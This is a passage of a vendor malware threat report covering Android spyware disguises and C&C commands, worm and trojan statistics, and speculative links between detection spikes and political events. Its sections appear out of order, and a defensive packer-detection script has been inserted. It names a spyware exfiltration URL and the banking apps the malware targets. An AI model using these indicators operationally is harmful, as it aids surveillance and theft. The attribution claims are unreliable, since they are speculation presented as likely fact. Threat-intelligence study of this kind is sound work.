After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by attackers
Make recordings
Make calls
4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version-1: Adobe Flash Player
Version-2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is the list of some commands that the malware can execute on your device:
Send_SMS – extract SMS content and send it to the C&C server
Send_USSD – send the USSD to the C&C server
Gethistory – monitor browser history
Start_AllApp – gather info about installed applications
Send_call – set the Intent action to call
Forward_call – forward incoming calls
ResForward_call – reset call forwarding
Go_Smsmnd – delete SMS content
Go_GetAlls – get SMS history
Dell_sms – delete SMS content in a conversation
Send_spam – send spam SMS
Start_Inject – call the injectors class
4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server:
contacts – Get contact details and email id
Mute – Set action to mute
Mms – Get MMS content
info – Get device information
4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version-1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version-2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version-1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version-1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via … another cryptominer named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
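A first-pass triage for the packing described in this section, as an added example that is not Comodo's code: it parses the PE section table and reports two indicators, the UPX0/UPX1 section names stock UPX leaves behind and sections whose byte entropy is close to 8 bits, which is the signal that survives when a modified UPX renames its sections. The sample images are built in memory and contain no executable content; the 7.2-bit entropy threshold is an assumption chosen for illustration.

```python
"""Packer triage for PE files: section-name and section-entropy indicators.
Added example; the PE images below are constructed, not real samples."""
import math
import random
import struct
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> List[Tuple[str, int, int]]:
    """Return (name, raw_offset, raw_size) for every section in a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER starts here
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size               # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                   # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, raw_ptr, raw_size))
    return sections


def packer_indicators(pe: bytes, entropy_threshold: float = 7.2) -> List[str]:
    """Human-readable indicators; an empty list means nothing suspicious."""
    findings = []
    for name, ptr, size in parse_sections(pe):
        if name.upper().startswith("UPX"):
            findings.append(f"section name {name!r} matches stock UPX")
        ent = shannon_entropy(pe[ptr:ptr + size])
        if size >= 256 and ent >= entropy_threshold:   # skip tiny sections
            findings.append(f"section {name!r} entropy {ent:.2f} "
                            "suggests compressed or encrypted content")
    return findings


# --- constructed sample images (no real code, just headers and filler) ---
def build_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Assemble a minimal PE32 image: DOS header, PE signature, COFF header,
    a zeroed 224-byte optional header, the section table and raw data."""
    opt_size = 224
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)    # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    out = bytearray(dos + b"PE\0\0" + coff + bytes(opt_size))
    raw_ptr = len(out) + 40 * len(sections)    # raw data starts after the table
    data = bytearray()
    for name, body in sections:
        out += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(body), 0x1000, len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        data += body
        raw_ptr += len(body)
    return bytes(out + data)


_rng = random.Random(2018)  # fixed seed so the sample is reproducible
HIGH_ENTROPY_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
LOW_ENTROPY_CODE = (b"\x90" * 64 + b"\xcc" * 64) * 16   # repetitive filler

STOCK_UPX_SAMPLE = build_pe([("UPX0", b""), ("UPX1", HIGH_ENTROPY_BLOB),
                             (".rsrc", LOW_ENTROPY_CODE)])
MODIFIED_UPX_SAMPLE = build_pe([(".text", HIGH_ENTROPY_BLOB), (".data", LOW_ENTROPY_CODE)])
PLAIN_SAMPLE = build_pe([(".text", LOW_ENTROPY_CODE), (".data", b"hello world " * 100)])

if __name__ == "__main__":
    for label, img in [("stock UPX", STOCK_UPX_SAMPLE), ("modified UPX", MODIFIED_UPX_SAMPLE),
                       ("plain", PLAIN_SAMPLE)]:
        print(label, "->", packer_indicators(img) or ["no indicators"])
```

Entropy alone also fires on legitimately compressed resources, so treat it as a triage signal that selects files for unpacking and deeper analysis rather than as a verdict.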
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two Trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a Trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, Trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo Trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and Trojans. It is possible that the virus outbreak was specifically used to disseminate Trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that Trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many Trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that Trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected Trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures, and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, http://http.cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:

- Extracts photos, audio and videos
